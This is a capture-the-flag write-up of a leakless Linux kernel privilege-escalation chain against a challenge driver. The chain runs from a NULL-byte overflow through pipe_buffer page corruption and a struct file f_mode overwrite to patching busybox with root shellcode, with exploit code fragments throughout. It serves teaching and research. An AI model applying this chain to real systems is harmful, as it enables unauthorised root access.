TL;DR

A single-byte NULL off-by-one in a kmalloc-1024 object is leveraged into a pipe_buffer.page LSB clear → page-level UAF → cross-cache reclaim into filp_cachep → struct file->f_mode overwrite → page-cache code injection into /bin/busybox (Dirty-Pipe style) → root code execution. Fully leakless: no kernel address is ever read.

Description: Make a contract and become a magical girl!

Target: Linux 6.17.7, x86-64. Mitigations on: SMEP, SMAP, KPTI (pti=on), KASLR, dmesg_restrict=1, kptr_restrict=1. The interactive shell runs as uid 1000.

Challenge setup

The distribution ships bzImage, vmlinux, initramfs.cpio and run.sh. QEMU boots with the usual hardening:

qemu-system-x86_64 \
    -kernel bzImage -initrd initramfs.cpio \
    -cpu qemu64,+smap,+smep -smp 1 -m 256M \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on" \
    -no-reboot -nographic -monitor /dev/null -enable-kvm

The init script defines the threat model:

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict      # no dmesg -> any %px leak is useless
chmod 600 flag.txt                            # /flag.txt readable by root only
insmod /driver/qb.ko
setsid cttyhack setuidgid 1000 /bin/sh        # our shell is UNPRIVILEGED (uid 1000)
poweroff -d 1 -n -f                           # <-- runs as ROOT when our shell exits

Two facts shape the whole exploit:

  • We are uid 1000; the flag is root-only, so we need root code execution.
  • When our shell exits, init (PID 1, root) runs poweroff -f. That is our eventual root trigger.

The module

qb.ko is not stripped. It registers the misc device /dev/QB with a single unlocked_ioctl handler and three globals:

char         *puregem;        // a single kmalloc-1024 object, zero-initialised, alloc-once, never freed
int           griefseed_num;  // a counter, written by CHECK, read nowhere
struct mutex  LOCK;

The file_operations wires only .unlocked_ioctl = qb_ioctl. There is no open, release, read, write or mmap handler, and crucially no kfree and no copy_to_user anywhere in the module.

#define QB_ALLOC 0x16C0   // "sign the contract"
#define QB_CLEAR 0x16C1   // "purify the soul gem"   <-- the bug lives here
#define QB_CHECK 0x16C2   // "attack the witch"

long qb_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    mutex_lock(&LOCK);

    if (cmd == QB_ALLOC) {                        // 0x16C0
        struct contract { char name[16]; char wish[48]; } req;  // 0x40 bytes
        if (copy_from_user(&req, arg, sizeof(req)) == 0 && !puregem) {
            // kmalloc_caches[NORMAL][10] == kmalloc-1024, GFP_KERNEL|__GFP_ZERO
            puregem = __kmalloc_cache_noprof(kmalloc_caches[10], 0xdc0, 0x400);
            printk("[QB] Name: %.16s, Wish: %.30s\n", req.name, req.wish);
            printk("[QB] puregem pointer: %px\n", puregem);   // leak, but dmesg_restrict kills it
            // NOTE: req is never stored into puregem, only logged.
        }
    }
    else if (cmd == QB_CLEAR) {                   // 0x16C1
        unsigned int size;
        if (copy_from_user(&size, arg, 4) == 0 && puregem && size <= 0x400) {
            memset(puregem, 0, size + 1);         // size==0x400 -> writes 0x401 bytes
        }
    }
    else if (cmd == QB_CHECK) {                   // 0x16C2
        int v[5];
        if (copy_from_user(v, arg, 0x14) == 0 && puregem) {
            int sum = v[0]*0xDE + v[1]*0x67 + v[2]*0x25D + v[3]*0x398 + v[4]*0x1FD;
            if (sum != 0x259B) BUG();             // gate, no heap effect
            griefseed_num++;
        }
    }

    mutex_unlock(&LOCK);
    return ...;
}

Role of each ioctl:

  • QB_ALLOC: creates the single kmalloc-1024 object puregem (once). User data is not stored, only printed. The %px leak is dead (dmesg_restrict).
  • QB_CLEAR: the bug. memset(puregem, 0, size+1).
  • QB_CHECK: a gate that must be passed (it BUG()s otherwise) but has no heap effect.

The QB_CHECK gate requires 0xDE*v0 + 0x67*v1 + 0x25D*v2 + 0x398*v3 + 0x1FD*v4 == 0x259B. Any solution works, e.g. {5, 7, 8, 1, 4} (5·222 + 7·103 + 8·605 + 1·920 + 4·509 = 9627 = 0x259B). It must be passed before the overflow so we don’t trip the BUG().
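
To double-check a candidate vector offline before sending it to the device, the gate arithmetic can be mirrored in userland. This is a minimal sketch: the coefficients and target come from the decompiled handler above, while the helper names qb_gate_sum and qb_gate_ok are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Coefficients and target copied from the decompiled QB_CHECK handler. */
static const uint32_t QB_COEFF[5] = { 0xDE, 0x67, 0x25D, 0x398, 0x1FD };
#define QB_TARGET 0x259B

/* Userland mirror of the kernel-side sum (hypothetical helper).
 * Unsigned arithmetic keeps 32-bit wraparound well defined. */
static uint32_t qb_gate_sum(const int32_t v[5])
{
    uint32_t sum = 0;

    assert(v != NULL);
    for (int i = 0; i < 5; i++)
        sum += (uint32_t)v[i] * QB_COEFF[i];
    return sum;
}

/* Returns 1 if v would pass the gate, 0 if it would reach BUG(). */
static int qb_gate_ok(const int32_t v[5])
{
    return qb_gate_sum(v) == QB_TARGET;
}
```

Calling qb_gate_ok on {5, 7, 8, 1, 4} returns 1; an all-zero vector returns 0, which on the real device would panic the box because of oops=panic.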

Vulnerability

QB_CLEAR validates the length with > instead of >=:

if (size > 0x400) { /* reject */ }      // accepts size == 0x400
...
memset(puregem, 0, size + 1);           // size==0x400 -> memset of 0x401 bytes

puregem is a kmalloc(0x400) buffer (1024 bytes, indices 0x000..0x3FF). With size == 0x400, memset writes 0x401 bytes → index 0x400 lands one byte past the buffer, writing 0.

Because puregem is allocated __GFP_ZERO and never written, the entire memset is a no-op except for that one byte hitting the first byte of the adjacent kmalloc-1024 object. This is a deterministic, replayable, single NULL-byte overflow.
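
The effect is easy to reproduce in userland. The sketch below is only a model, not kernel code: two adjacent 0x400-byte objects are represented by one flat struct, and qb_clear_model (a hypothetical name) applies the same bounds check and the same memset length as QB_CLEAR.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define OBJ_SIZE 0x400   /* kmalloc-1024 object size */

/* Two back-to-back slab objects, modelled as one flat userland struct. */
struct fake_slab {
    unsigned char puregem[OBJ_SIZE];    /* zeroed, like the __GFP_ZERO object */
    unsigned char neighbour[OBJ_SIZE];  /* stands in for the pipe_buffer array */
};

/* Same check and same memset length as QB_CLEAR.
 * Returns the number of bytes written, or 0 if the size is rejected. */
static size_t qb_clear_model(struct fake_slab *s, unsigned int size)
{
    assert(s != NULL);
    if (size > OBJ_SIZE)
        return 0;                        /* rejected, as in the module */
    /* Write through the whole-struct pointer so the one-byte spill into
     * the neighbour stays inside this model's own storage. */
    memset((unsigned char *)s, 0, (size_t)size + 1);
    return (size_t)size + 1;
}
```

With the neighbour pre-filled with 0xAA, a call with size 0x400 reports 0x401 bytes written and leaves neighbour[0] == 0x00 while neighbour[1] is still 0xAA.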

Object collision in kmalloc-1024

A pipe keeps a ring of pipe_buffer descriptors (default PIPE_DEF_BUFFERS = 16), allocated as one array:

struct pipe_buffer {
    struct page *page;                       /* +0x00  <-- our NULL byte hits its LSB */
    unsigned int offset, len;                /* +0x08, +0x0C */
    const struct pipe_buf_operations *ops;   /* +0x10 */
    unsigned int flags;                      /* +0x18 */
    unsigned long private;                   /* +0x20 */
};                                           /* 40 bytes */

16 * 40 = 640 bytes → lands in kmalloc-1024, the same cache as puregem. By grooming the slab so puregem’s neighbour is a pipe_buffer array, the NULL byte clears the LSB of pipe_buffer[0].page.
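
The size arithmetic can be sanity-checked with a userland mirror of the layout. This is a sketch under two assumptions: an LP64 target (8-byte pointers and unsigned long, as on x86-64), and a simplified bucket rule that just rounds up to the next power of two. The names pipe_buffer_mirror and kmalloc_bucket are illustrative only.

```c
#include <assert.h>
#include <stddef.h>

/* Userland mirror of the layout above; only the field sizes matter here.
 * Assumes LP64 (8-byte pointers and unsigned long). */
struct pipe_buffer_mirror {
    void         *page;          /* +0x00 */
    unsigned int  offset, len;   /* +0x08, +0x0C */
    const void   *ops;           /* +0x10 */
    unsigned int  flags;         /* +0x18 */
    unsigned long private_data;  /* +0x20 */
};

#define PIPE_DEF_BUFFERS 16

/* Simplified bucket choice: round up to the next power of two.
 * Real kernels also have 96- and 192-byte caches, irrelevant at this size. */
static size_t kmalloc_bucket(size_t size)
{
    size_t bucket = 8;

    assert(size > 0);
    while (bucket < size)
        bucket <<= 1;
    return bucket;
}
```

Under those assumptions, kmalloc_bucket(PIPE_DEF_BUFFERS * sizeof(struct pipe_buffer_mirror)) and kmalloc_bucket(0x400) both give 1024, which is why the ring and puregem can end up side by side.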

Page-pointer LSB clear (PageJack-style)

The kernel keeps a struct page descriptor for every physical page in the flat vmemmap array. Since sizeof(struct page) == 0x40, every valid struct page * is 0x40-aligned. Clearing its low byte rounds the pointer down to the previous 0x100 boundary, which moves it back by 0 to 3 entries, so it now describes a physical page 0 to 3 PFNs below the original (0 means the low byte was already zero and nothing changed). With a dense pipe spray, that neighbouring page reliably belongs to another pipe.
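
The pointer arithmetic can be written down directly. In this sketch the helper names clear_low_byte and pfn_shift are hypothetical, and any address fed to them is a placeholder chosen for the example, since the exploit never learns a real one.

```c
#include <assert.h>
#include <stdint.h>

#define STRUCT_PAGE_SIZE 0x40u   /* sizeof(struct page), from the text */

/* What the stray NULL byte does to a little-endian pointer:
 * it zeroes the least significant byte. */
static uint64_t clear_low_byte(uint64_t page_ptr)
{
    return page_ptr & ~(uint64_t)0xff;
}

/* How many struct page entries (and therefore PFNs) the pointer moved back. */
static unsigned int pfn_shift(uint64_t page_ptr)
{
    assert(page_ptr % STRUCT_PAGE_SIZE == 0);   /* valid pointers are 0x40-aligned */
    return (unsigned int)((page_ptr - clear_low_byte(page_ptr)) / STRUCT_PAGE_SIZE);
}
```

A pointer ending in 0xc0 moves back three entries, one ending in 0x40 moves back one, and one ending in 0x00 does not move at all. That last case is why the detection step has to cope with finding no alias.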

The bytes you write() into a pipe live in page (a separate 4 KiB page), so the redirected pipe_buffer now reads/writes another pipe’s data page. No PTE is involved: the corruption is purely in the kernel pointer dereferenced for pipe I/O.

Pipe append semantics and the marker design

A pipe_buffer tracks offset (read position) and len (unread bytes). The next write() appends at page + offset + len; a read() that leaves len > 0 advances offset but does not call pipe_buf_release/put_page. This drives the whole detection-and-corruption dance.

Each pipe is tagged with 2 + 2 bytes:

uint16_t mark = MARK_BASE + i;
write(pipes[i][1], &mark, sizeof(mark));   // 2 bytes: unique marker
write(pipes[i][1], "23", 2);               // 2 bytes: padding

  • The 2-byte marker identifies the pipe’s data page (leakless detection below).
  • The 2-byte padding keeps the buffer non-empty after detection reads 2 bytes, and positions the write cursor at offset 4 for the later f_mode overwrite.

After tagging, the buffer sits at offset=0, len=4. The detection scan reads 2 bytes, leaving offset=2, len=2 → still offset + len == 4, page not released. The final corruption write then lands at page offset 4.
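
The cursor bookkeeping is easy to get wrong, so here is a toy model of a single pipe_buffer slot. It is a simplification for reasoning only: slot_model, model_write and model_read are invented names, and the model ignores page boundaries and merge flags.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy model of one pipe_buffer slot; not kernel code. */
struct slot_model {
    size_t   offset;    /* read position inside the page */
    size_t   len;       /* unread bytes */
    bool     attached;  /* false once the page has been released */
    unsigned page_id;   /* bumped every time a fresh page is attached */
};

/* Append n bytes; returns the page offset where they land. */
static size_t model_write(struct slot_model *s, size_t n)
{
    assert(s != NULL);
    if (!s->attached) {             /* no page yet, or it was released */
        s->offset = 0;
        s->len = 0;
        s->attached = true;
        s->page_id++;
    }
    size_t at = s->offset + s->len;
    s->len += n;
    return at;
}

/* Consume up to n bytes; the page is dropped only when len reaches 0. */
static void model_read(struct slot_model *s, size_t n)
{
    assert(s != NULL);
    if (n > s->len)
        n = s->len;
    s->offset += n;
    s->len -= n;
    if (s->len == 0)
        s->attached = false;        /* stands in for pipe_buf_release() */
}
```

Starting from a zeroed slot, write 2, write 2, read 2 leaves offset=2, len=2 on the same page, and the next 4-byte write lands at offset 4. With the marker alone (write 2, read 2) the slot is released, so the next write lands at offset 0 of a different page.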

Cross-cache: filp_cachep and the buddy allocator

struct file lives in its own dedicated cache, filp_cachep. Slab caches are isolated from each other at the slab layer, but they all draw their backing pages from the same buddy allocator. The pipe data page is itself a plain buddy-allocator page (only the pipe_buffer array lives in kmalloc-1024), so once it is freed it can be reissued to filp_cachep on that cache’s next refill. That is how we reach a struct file without any in-module free primitive.

struct file {
    spinlock_t                    f_lock;     /* +0x00 (4 bytes) */
    fmode_t                       f_mode;     /* +0x04  <-- target */
    const struct file_operations *f_op;       /* +0x08 */
    /* ... */
};

f_mode sits at offset 4 (confirmed with pahole -C file vmlinux, and empirically: a write at page-offset 4 flips writability). vfs_write() returns -EBADF unless f_mode & FMODE_WRITE is set. We overwrite f_mode with 0x084f801f (FMODE_WRITE | FMODE_PWRITE | FMODE_LSEEK | FMODE_OPENED | FMODE_CAN_*), turning an O_RDONLY busybox handle into a writable one.
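
To see which bits matter for the write path, the low five mode bits can be decoded in userland. The sketch below lists only those five, with the values I understand them to have in include/linux/fs.h; the upper bits of 0x084f801f are deliberately left undecoded because their values vary between kernel versions. mode_allows_pwrite and strip_write_bits are illustrative helpers, and the FMODE_CAN_WRITE check is not modelled.

```c
#include <assert.h>
#include <stdint.h>

/* Low fmode_t bits (assumed values; verify against the target's headers). */
#define FMODE_READ   0x1u
#define FMODE_WRITE  0x2u
#define FMODE_LSEEK  0x4u
#define FMODE_PREAD  0x8u
#define FMODE_PWRITE 0x10u

#define FAKE_FMODE   0x084f801fu   /* value written by the exploit */

/* Model of the two mode checks on the pwrite() path; 1 if both pass. */
static int mode_allows_pwrite(uint32_t f_mode)
{
    return (f_mode & FMODE_PWRITE) && (f_mode & FMODE_WRITE);
}

/* Hypothetical read-only counterpart: the fake mode minus its write bits. */
static uint32_t strip_write_bits(uint32_t f_mode)
{
    return f_mode & ~(FMODE_WRITE | FMODE_PWRITE);
}
```

mode_allows_pwrite(FAKE_FMODE) is 1, while the same value with the two write bits stripped gives 0. Those two bits are the whole difference the 4-byte overwrite has to make.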

Busybox recon: cave, reboot wrapper, trampoline, shellcode

busybox is not PIE (ET_EXEC, base 0x400000), so file_offset = vaddr − 0x400000.

init runs poweroff -f, which calls the reboot() syscall. We locate busybox’s reboot wrapper by its magic constants:

$ objdump -d -M intel busybox | grep 0xfee1dead
  48bf90: f3 0f 1e fa      endbr64                 <-- function entry (OFF_TRAMP)
  48bf94: 89 fa            mov edx,edi             ;  cmd
  48bf96: be 69 19 12 28   mov esi,0x28121969      ;  MAGIC2
  48bf9b: bf ad de e1 fe   mov edi,0xfee1dead      ;  MAGIC1
  48bfa0: b8 a9 00 00 00   mov eax,0xa9            ;  __NR_reboot (169)
  48bfa5: 0f 05            syscall

The first three instructions of the wrapper (0x48bf90 to 0x48bf9a) span 11 bytes, enough for a 10-byte trampoline; the rest of the function is never reached once the trampoline jumps away. There is no 64-byte run of padding in this dense binary, so we sacrifice a function: scanning endbr64 entries with enough room yields 0x5df693 (0xAA bytes) as a code cave.

Trampoline (overwrites the reboot entry, jumps into the cave):

mov r8, 0x5df693
jmp r8

49 c7 c0 93 f6 5d 00 41 ff e0 (10 bytes).
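
If the cave address changes (for example with a different busybox build), the ten bytes can be regenerated instead of hand-assembled. This is a small sketch; build_trampoline is a hypothetical helper, and it only handles targets below 2 GiB because mov r8, imm32 sign-extends its immediate.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TRAMP_LEN 10

/* Emit `mov r8, imm32 ; jmp r8` for a target address below 2 GiB. */
static void build_trampoline(uint32_t target, uint8_t out[TRAMP_LEN])
{
    static const uint8_t mov_r8[3] = { 0x49, 0xc7, 0xc0 };  /* REX.W+B, C7 /0 */
    static const uint8_t jmp_r8[3] = { 0x41, 0xff, 0xe0 };  /* REX.B,   FF /4 */

    assert(out != NULL);
    assert(target < 0x80000000u);    /* imm32 is sign-extended to 64 bits */

    memcpy(out, mov_r8, sizeof(mov_r8));
    for (int i = 0; i < 4; i++)      /* little-endian immediate */
        out[3 + i] = (uint8_t)(target >> (8 * i));
    memcpy(out + 7, jmp_r8, sizeof(jmp_r8));
}
```

For target 0x5df693 this reproduces the byte string above.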

The shellcode is a self-contained execve("/bin/sh") that builds its strings on the stack (the root poweroff process has a valid stack). It is 48 bytes long and fits easily in the 0xAA-byte cave:

from pwn import *
context.arch = 'amd64'
sc = asm(shellcraft.amd64.linux.sh())

Exploitation

Step 1: sandwich puregem between pipe rings

puregem is allocated between two halves of the pipe spray, so its neighbour is reliably a pipe_buffer array rather than a slab edge:

spray_pipes(0, N_PIPE_HALF);         // 0x40 pipes
qb_alloc(fd, name, wish);            // puregem in the middle
spray_pipes(N_PIPE_HALF, N_PIPE);    // 0x40 more
qb_check(fd);                        // pass the gate first
qb_clear(fd, 0x400);                 // FIRE: NULL byte on pipe_buffer[0].page
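
The qb_* helpers used above are thin ioctl wrappers. The write-up does not show them, so the following is one plausible shape rather than the original code: the request numbers and argument layouts come from the decompiled handler, and the struct name qb_contract is made up.

```c
#include <assert.h>
#include <string.h>
#include <sys/ioctl.h>

#define QB_ALLOC 0x16C0
#define QB_CLEAR 0x16C1
#define QB_CHECK 0x16C2

/* Request layout taken from the decompiled handler: 16 + 48 bytes. */
struct qb_contract { char name[16]; char wish[48]; };

/* Allocate puregem; name and wish are only logged by the module. */
static int qb_alloc(int fd, const char *name, const char *wish)
{
    struct qb_contract req;

    assert(name != NULL && wish != NULL);
    memset(&req, 0, sizeof(req));
    strncpy(req.name, name, sizeof(req.name) - 1);
    strncpy(req.wish, wish, sizeof(req.wish) - 1);
    return ioctl(fd, QB_ALLOC, &req);
}

/* Pass the arithmetic gate with a known-good vector. */
static int qb_check(int fd)
{
    int v[5] = { 5, 7, 8, 1, 4 };   /* sums to 0x259B */
    return ioctl(fd, QB_CHECK, v);
}

/* size == 0x400 makes the module memset 0x401 bytes. */
static int qb_clear(int fd, unsigned int size)
{
    return ioctl(fd, QB_CLEAR, &size);
}
```

Here fd is expected to come from open("/dev/QB", O_RDWR). On any other descriptor the calls simply fail with -1, which is handy for dry runs away from the target.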

Step 2: leakless alias detection

If the groom worked, exactly one pipe’s pipe_buffer[0].page now points at another pipe’s data page. We read each marker back; the corrupted pipe returns somebody else’s marker:

int detect_alias(int *overlap, int *origin) {
    for (int i = 0; i < N_PIPE; i++) {
        unsigned short val = 0;
        if (read(pipes[i][0], &val, sizeof(val)) != sizeof(val)) continue;
        if (val == (unsigned short)(MARK_BASE + i)) continue;     // healthy
        int cand = (int)val - MARK_BASE;                          // whose page?
        if (cand >= 0 && cand < N_PIPE && cand != i) {
            *overlap = i; *origin = cand;
            return 1;
        }
    }
    return 0;
}

The cand validation discards the case where the byte landed on an unrelated page. No kernel address is ever read. This is what makes the exploit leakless. Each read consumes 2 of 4 bytes, so neither page is released; overlap and origin both reference the shared page.

Step 3: free the shared page (page UAF)

close(pipes[origin][0]);
close(pipes[origin][1]);    // pipe_release -> put_page; page returns to buddy

The overlap pipe still holds a stale .page pointing at the freed page: page-level use-after-free.

Step 4: cross-cache reclaim into filp

void spray_files(void) {
    for (int i = 0; i < N_FILE; i++)             // N_FILE = 0x50
        file_fds[i] = open("/bin/busybox", O_RDONLY);
}

filp_cachep grabs fresh slab pages; one reuses the freed page and fills it with struct files. The struct file at page offset 0 has its f_mode at page offset 4.

Step 5: overwrite f_mode through the dangling pipe

void corrupt_fmode(int overlap) {
    uint32_t fmode = FAKE_FMODE;                 // 0x084f801f
    write(pipes[overlap][1], &fmode, sizeof(fmode));  // appends at page offset 4 = f_mode
}

Had we written only the 2-byte marker, reading 2 bytes would drain the buffer (len == 0), pipe_buf_release() would drop the corrupted page, and the next write would go to a fresh page. The 2-byte padding keeps the page attached and aligns this write onto f_mode.

Step 6: find the writable handle

Only the struct file at page offset 0 was corrupted. We probe each fd non-destructively (read a byte, write it back); only the corrupted one accepts the write:

int find_writable(void) {
    for (int i = 0; i < N_FILE; i++) {
        unsigned char b;
        if (pread(file_fds[i], &b, 1, 0) != 1) continue;   // never write back an unread byte
        if (pwrite(file_fds[i], &b, 1, 0) == 1)   // FMODE_WRITE set -> writable
            return file_fds[i];
    }
    return -1;
}

Step 7: page-cache code injection (Dirty-Pipe style)

Writing through the corrupted (now writable) struct file modifies /bin/busybox’s page cache. Busybox text is mapped from that same page cache (shared, no COW for text), so the patch is seen by any process that execs busybox:

#define OFF_SHELL (0x5df693 - 0x400000)   // cave  -> shellcode
#define OFF_TRAMP (0x48bf90 - 0x400000)   // reboot entry -> trampoline

patch_busybox(fd_corrupt, OFF_SHELL, shellcode,  sizeof(shellcode)  - 1);
patch_busybox(fd_corrupt, OFF_TRAMP, trampoline, sizeof(trampoline) - 1);
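
patch_busybox is called above but not shown. A minimal version could look like the sketch below, which is an assumption about its shape: a pwrite loop that tolerates short writes, plus a hypothetical verify_patch helper that reads the bytes back.

```c
#include <assert.h>
#include <errno.h>
#include <fcntl.h>      /* open() and O_* flags for the caller */
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Write len bytes at file offset off, retrying on short writes and EINTR.
 * Returns 0 on success, -1 on error. */
static int patch_busybox(int fd, off_t off, const void *buf, size_t len)
{
    const unsigned char *p = buf;

    assert(buf != NULL);
    while (len > 0) {
        ssize_t n = pwrite(fd, p, len, off);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0)
            return -1;              /* no progress; do not spin forever */
        p += n;
        off += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Read the range back and compare; returns 1 on match, 0 otherwise. */
static int verify_patch(int fd, off_t off, const void *buf, size_t len)
{
    unsigned char tmp[256];

    assert(buf != NULL && len <= sizeof(tmp));
    if (pread(fd, tmp, len, off) != (ssize_t)len)
        return 0;
    return memcmp(tmp, buf, len) == 0;
}
```

With the offsets above, OFF_SHELL evaluates to 0x1df693 and OFF_TRAMP to 0x8bf90. Reading each range back after patching is a cheap way to confirm the write reached the page cache before typing exit.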

Step 8: trigger root

The exploit only patches and returns. We then type exit:

exit  ->  init (root) runs `poweroff -d 1 -n -f`
      ->  executes patched busybox
      ->  reboot() entry is now our trampoline
      ->  jmp 0x5df693  ->  execve("/bin/sh")  ->  ROOT shell on the console

reboot() never runs (we jumped away), so the box doesn’t power off; we get an interactive root shell instead.

Notes & lessons

What was already familiar. PageJack (page-level UAF by clearing the LSB of pipe_buffer.page) and Dirty Pipe (writing into a file’s page cache to patch a shared executable) were techniques I already knew going in. They are the bookends of this chain, not the part I learned.

What I actually learned: corrupting struct file. The novel piece for me was the bridge between those two techniques: turning a page-level UAF into an arbitrary page-cache write by hijacking a struct file. The specific lessons:

  • f_mode is a privilege bit you can flip. A struct file opened O_RDONLY only lacks FMODE_WRITE; the underlying inode and page cache are otherwise fully reachable. Overwriting f_mode (offset 4) with 0x084f801f (FMODE_WRITE | FMODE_PWRITE | ...) is enough to make vfs_write/pwrite accept the handle. No f_op hijack, no ROP: a single 4-byte write converts a read-only fd into a writable one.
  • struct file is a great cross-cache landing target. Spraying open("/bin/busybox") fills filp_cachep with predictable struct files; the one at page offset 0 puts f_mode exactly at the offset our dangling pipe writes to. The reclaim is reliable and needs no leak to confirm: I just probe each fd with a non-destructive read/write-back and watch which one becomes writable.
  • A writable handle on a shared binary == Dirty Pipe. Once the O_RDONLY busybox fd is writable, pwrite lands straight in busybox’s page cache, which is shared (no COW for text) with every process that execs it. That is what let me rewrite /bin/busybox and get root’s poweroff to run my shellcode. The corruption of struct file is the thing that made the Dirty-Pipe-style finish possible here.

References